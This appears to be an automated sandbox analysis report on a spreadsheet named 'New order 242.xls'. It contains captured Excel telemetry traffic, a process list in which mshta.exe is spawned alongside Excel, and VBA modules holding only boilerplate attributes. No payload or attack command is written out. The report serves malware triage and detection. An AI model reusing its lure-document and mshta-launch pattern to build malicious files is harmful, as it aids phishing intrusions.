                                          2025-03-17 08:29:37 UTC16384INData Raw: 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 35 22 20 46 3d 22 72 65 73 75 6c 74 73 5f 49 73 4e 75 6c 6c 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 66 61 6c 73 65 22 20 54 3d 22 42 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20
                                          Data Ascii: <S T="5" F="results_IsNull" /> </L> <R> <V V="false" T="B" /> </R> </O> </L> <R> <O T="EQ"> <L>


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          2192.168.2.124976613.107.246.604436800C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                          TimestampBytes transferredDirectionData
                                          2025-03-17 08:29:42 UTC214OUTGET /rules/rule120603v8s19.xml HTTP/1.1
                                          Connection: Keep-Alive
                                          Accept-Encoding: gzip
                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.16827; Pro)
                                          Host: otelrules.svc.static.microsoft
                                          2025-03-17 08:29:42 UTC515INHTTP/1.1 200 OK
                                          Date: Mon, 17 Mar 2025 08:29:42 GMT
                                          Content-Type: text/xml
                                          Content-Length: 2128
                                          Connection: close
                                          Vary: Accept-Encoding
                                          Cache-Control: public, max-age=604800, immutable
                                          Last-Modified: Tue, 09 Apr 2024 00:26:04 GMT
                                          ETag: "0x8DC582BA41F3C62"
                                          x-ms-request-id: 34637610-b01e-0001-0dfd-9646e2000000
                                          x-ms-version: 2018-03-28
                                          x-azure-ref: 20250317T082942Z-186895dd8bdz6l5qhC1EWRwurn00000004hg000000003cp7
                                          x-fd-int-roxy-purgeid: 0
                                          X-Cache-Info: L1_T2
                                          X-Cache: TCP_HIT
                                          Accept-Ranges: bytes
                                          2025-03-17 08:29:42 UTC2128INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 33 22 20 56 3d 22 38 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 41 70 70 6c 69 63 61 74 69 6f 6e 41 64 64 69 74 69 6f 6e 61 6c 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 45 3d 22 66 61 6c 73 65 22 20 44 4c 3d
                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120603" V="8" DC="SM" EN="Office.System.SystemHealthMetadataApplicationAdditional" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticuserinessImpact" E="false" DL=


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          3192.168.2.124976513.107.246.604436800C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                          TimestampBytes transferredDirectionData
                                          2025-03-17 08:29:42 UTC214OUTGET /rules/rule120607v1s19.xml HTTP/1.1
                                          Connection: Keep-Alive
                                          Accept-Encoding: gzip
                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.16827; Pro)
                                          Host: otelrules.svc.static.microsoft
                                          2025-03-17 08:29:42 UTC470INHTTP/1.1 200 OK
                                          Date: Mon, 17 Mar 2025 08:29:42 GMT
                                          Content-Type: text/xml
                                          Content-Length: 204
                                          Connection: close
                                          Cache-Control: public, max-age=604800, immutable
                                          Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
                                          ETag: "0x8DC582BB6C8527A"
                                          x-ms-request-id: dba63547-c01e-000b-0699-96e255000000
                                          x-ms-version: 2018-03-28
                                          x-azure-ref: 20250317T082942Z-186895dd8bdmf545hC1EWRky1s00000007u0000000002gwv
                                          x-fd-int-roxy-purgeid: 0
                                          X-Cache: TCP_HIT
                                          Accept-Ranges: bytes
                                          2025-03-17 08:29:42 UTC204INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 37 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 45 52 3d 22 31 32 30 36 30 33 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 54 53 20 54 3d 22 31 22 20 49 64 3d 22 62 62 70 7a 73 22 20 41 3d 22 39 34 30 74 63 20 39 78 35 6a 73 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 54 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 31 22 20 2f 3e 0d 0a 20 20 3c 2f 54 3e 0d 0a 3c 2f 52 3e
                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120607" V="1" DC="SM" T="Subrule" ER="120603" xmlns=""> <S> <UTS T="1" Id="bbpzs" A="940tc 9x5js" /> </S> <T> <S T="1" /> </T></R>


                                          Statistics

                                          CPU Usage

                                          050100s020406080100

                                          Click to jump to process

                                          Memory Usage

                                          050100s0.0050100150200MB

                                          Click to jump to process

                                          High Level Behavior Distribution

                                          • File
                                          • Registry

                                          Click to dive into process behavior distribution

                                          Behavior

                                          Click to jump to process

                                          System Behavior

                                          General

                                          Target ID:0
                                          Start time:04:28:27
                                          Start date:17/03/2025
                                          Path:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding
                                          Imagebase:0xa60000
                                          File size:53'161'064 bytes
                                          MD5 hash:4A871771235598812032C822E6F68F19
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:false
                                          Show Windows behavior

                                          File Activities

                                          Show Windows behavior

                                          Section Activities

                                          Show Windows behavior

                                          Registry Activities

                                          Show Windows behavior

                                          COM Activities

                                          There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                          Show Windows behavior

                                          Process Activities

                                          Show Windows behavior

                                          Thread Activities

                                          Show Windows behavior

                                          Memory Activities

                                          Show Windows behavior

                                          System Activities

                                          There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                          Show Windows behavior

                                          Windows UI Activities

                                          There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                          There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

                                          General

                                          Target ID:10
                                          Start time:04:29:29
                                          Start date:17/03/2025
                                          Path:C:\Windows\SysWOW64\mshta.exe
                                          Wow64 process (32bit):true
                                          Commandline:C:\Windows\SysWOW64\mshta.exe -Embedding
                                          Imagebase:0x7ff6c4ed0000
                                          File size:13'312 bytes
                                          MD5 hash:06B02D5C097C7DB1F109749C45F3F505
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:false
                                          There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                          Show Windows behavior

                                          Section Activities

                                          Show Windows behavior

                                          Registry Activities

                                          Show Windows behavior

                                          COM Activities

                                          There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                          There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                          Show Windows behavior

                                          Thread Activities

                                          Show Windows behavior

                                          Memory Activities

                                          There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                          There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                          Show Windows behavior

                                          Windows UI Activities

                                          There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

                                          General

                                          Target ID:12
                                          Start time:04:29:32
                                          Start date:17/03/2025
                                          Path:C:\Windows\splwow64.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\splwow64.exe 12288
                                          Imagebase:0x7ff6b5dd0000
                                          File size:163'840 bytes
                                          MD5 hash:77DE7761B037061C7C112FD3C5B91E73
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:false
                                          There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                          Show Windows behavior

                                          Section Activities

                                          There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                          There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                          Show Windows behavior

                                          Process Activities

                                          Show Windows behavior

                                          Thread Activities

                                          Show Windows behavior

                                          Memory Activities

                                          There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                          There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                          There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                          There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

                                          General

                                          Target ID:16
                                          Start time:04:29:48
                                          Start date:17/03/2025
                                          Path:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\user\Desktop\New order 242.xls"
                                          Imagebase:0xa60000
                                          File size:53'161'064 bytes
                                          MD5 hash:4A871771235598812032C822E6F68F19
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:false
                                          Show Windows behavior

                                          File Activities

                                          Show Windows behavior

                                          Section Activities

                                          Show Windows behavior

                                          Registry Activities

                                          Show Windows behavior

                                          COM Activities

                                          There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                          Show Windows behavior

                                          Process Activities

                                          Show Windows behavior

                                          Thread Activities

                                          Show Windows behavior

                                          Memory Activities

                                          Show Windows behavior

                                          System Activities

                                          There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                          Show Windows behavior

                                          Windows UI Activities

                                          There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                          There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

                                          Disassembly

                                          Code Analysis

                                          Call Graph

                                          Hide Legend
                                          • Entrypoint
                                          • Decryption Function
                                          • Executed
                                          • Not Executed
                                          • Show Help
                                          callgraph 1 Error: Graph is empty

                                          Module: Sheet1

                                          Declaration
                                          LineContent
                                          1

                                          Attribute VB_Name = "Sheet1"

                                          2

                                          Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"

                                          3

                                          Attribute VB_GlobalNameSpace = False

                                          4

                                          Attribute VB_Creatable = False

                                          5

                                          Attribute VB_PredeclaredId = True

                                          6

                                          Attribute VB_Exposed = True

                                          7

                                          Attribute VB_TemplateDerived = False

                                          8

                                          Attribute VB_Customizable = True

                                          Module: Sheet2

                                          Declaration
                                          LineContent
                                          1

                                          Attribute VB_Name = "Sheet2"

                                          2

                                          Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"

                                          3

                                          Attribute VB_GlobalNameSpace = False

                                          4

                                          Attribute VB_Creatable = False

                                          5

                                          Attribute VB_PredeclaredId = True

                                          6

                                          Attribute VB_Exposed = True

                                          7

                                          Attribute VB_TemplateDerived = False

                                          8

                                          Attribute VB_Customizable = True

                                          Module: Sheet3

                                          Declaration
                                          LineContent
                                          1

                                          Attribute VB_Name = "Sheet3"

                                          2

                                          Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"

                                          3

                                          Attribute VB_GlobalNameSpace = False

                                          4

                                          Attribute VB_Creatable = False

                                          5

                                          Attribute VB_PredeclaredId = True

                                          6

                                          Attribute VB_Exposed = True

                                          7

                                          Attribute VB_TemplateDerived = False

                                          8

                                          Attribute VB_Customizable = True

                                          Module: ThisWorkbook

                                          Declaration
                                          LineContent
                                          1

                                          Attribute VB_Name = "ThisWorkbook"

                                          2

                                          Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"

                                          3

                                          Attribute VB_GlobalNameSpace = False

                                          4

                                          Attribute VB_Creatable = False

                                          5

                                          Attribute VB_PredeclaredId = True

                                          6

                                          Attribute VB_Exposed = True

                                          7

                                          Attribute VB_TemplateDerived = False

                                          8

                                          Attribute VB_Customizable = True